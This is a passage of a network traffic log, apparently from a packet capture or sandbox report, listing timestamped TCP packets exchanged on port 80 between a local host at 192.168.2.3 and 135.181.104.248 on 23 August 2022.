Aug 23, 2022 03:43:00.918024063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918062925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918101072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918104887 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918108940 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918144941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918183088 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918186903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918190956 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918227911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918267965 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918301105 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918308973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918311119 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918334007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918349981 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918391943 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918391943 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918433905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918438911 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918473005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918512106 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918519974 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918555021 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918561935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918593884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918634892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918644905 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918675900 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918716908 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918725967 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918759108 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918759108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918798923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918838978 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918850899 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918879986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918919086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918930054 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918957949 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.918967009 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918999910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919042110 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919075966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919084072 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919092894 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919127941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919167995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919186115 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919209957 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919213057 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919249058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919287920 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919296980 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919328928 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919379950 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919399023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919439077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919470072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919478893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919518948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919529915 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919564962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919606924 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919646025 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919687033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919727087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919764042 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919805050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919845104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919886112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919926882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919960976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919965982 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.919991016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919995070 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.919998884 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920001984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920005083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920006037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920012951 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920046091 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920047045 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920114994 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920156956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920169115 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920197964 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920238018 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920243979 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920279980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920320034 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920324087 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920361042 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920361996 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920401096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920440912 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920445919 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920480967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920520067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920525074 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920563936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920604944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920614958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920644045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920684099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920706987 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920723915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920725107 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920772076 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920811892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920815945 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920851946 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920890093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920898914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920929909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.920943022 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.920969963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921011925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921017885 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921055079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921093941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921098948 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921133041 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921133995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921175003 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921214104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921222925 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921255112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921295881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921304941 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921338081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921426058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921431065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921466112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921467066 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921509027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921552896 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921555996 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921593904 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921612978 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921634912 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921639919 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921654940 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921658993 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921679020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921679974 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921698093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921705008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921713114 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921716928 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921736956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921736956 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921755075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921773911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921783924 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921787977 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921791077 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921792030 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921811104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921819925 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921825886 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921832085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921849966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921849012 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921869040 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921871901 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921885967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921896935 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921900988 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921910048 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921926975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921946049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921963930 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921962976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921978951 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921982050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921983004 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.921984911 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921998978 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.921999931 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922022104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922039986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922043085 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922049046 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922059059 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922059059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922070980 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922076941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922092915 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922095060 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922113895 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922116995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922127008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922132015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922147036 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922148943 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922168016 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922177076 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922187090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922188044 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922204018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922204971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922224045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922223091 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922241926 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922241926 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922256947 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922261953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922281027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922282934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922292948 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922297955 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922317028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922321081 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922336102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922343016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922354937 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922368050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922373056 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922374964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922391891 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922405958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922410011 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922425985 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922429085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922449112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922456026 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922467947 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922477961 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922487974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922498941 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922506094 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922508001 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922530890 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922544956 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922573090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922591925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922610044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922632933 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922642946 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922652960 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922677040 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922682047 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922697067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922714949 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922739983 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922759056 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922760010 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922777891 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922816038 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922844887 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922863960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922904968 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922909975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922929049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922959089 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.922967911 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.922993898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923013926 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923032999 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923036098 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923063993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923070908 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923085928 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923096895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923103094 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923119068 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923137903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923170090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923180103 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923198938 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923202991 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923249006 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923269033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923269987 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923300028 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923316956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923331022 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923369884 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923381090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923399925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923429966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923444033 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923463106 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923474073 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923496008 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923499107 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923542976 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923588991 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923593998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923613071 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923644066 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923664093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923664093 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923685074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923711061 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923718929 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923729897 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923751116 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923760891 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923772097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923805952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923816919 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923825979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923842907 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923870087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923877954 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923890114 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923907995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923927069 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923933983 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.923959970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.923974991 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924005032 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924011946 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924036980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924069881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924103022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924118996 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924124956 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924150944 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924161911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924194098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924213886 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924217939 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924237013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924253941 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924283028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924346924 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924365044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924397945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.924407959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.924446106 CEST	80	49812	135.181.104.248	192.168.2.3
